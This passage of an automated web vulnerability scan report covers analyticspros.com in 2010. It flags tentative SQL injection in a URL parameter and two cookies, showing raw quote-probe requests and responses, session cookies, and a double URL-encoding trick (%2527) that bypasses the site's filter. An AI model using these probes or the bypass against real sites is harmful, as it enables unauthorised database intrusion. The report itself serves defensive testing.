1.167. http://www.analyticspros.com/component/jsetup/comment/add.html [commenttype parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The commenttype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the commenttype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the commenttype request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20%2527&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20%2527%2527&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:05:18 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:05:18 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27167


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.168. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true%2527; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:14:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true%2527%2527; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10; __utmmobile=0xade0ac5896f84b3c

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:14:23 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:14:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 27116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.169. http://www.analyticspros.com/component/jsetup/comment/add.html [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:08:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/jsetup/comment/add.html?commenttype=20&etid=46&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTYwJmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD00NiZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:08:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:08:51 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:08:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.170. http://www.analyticspros.com/component/jsetup/comment/add.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/jsetup/comment/add.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/jsetup/comment/add.html?commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.26.9.1288999622937; ki_t=1288999540201%3B1288999540201%3B1288999677879%3B1%3B10'; __utmmobile=0xade0ac5896f84b3c

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:21:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database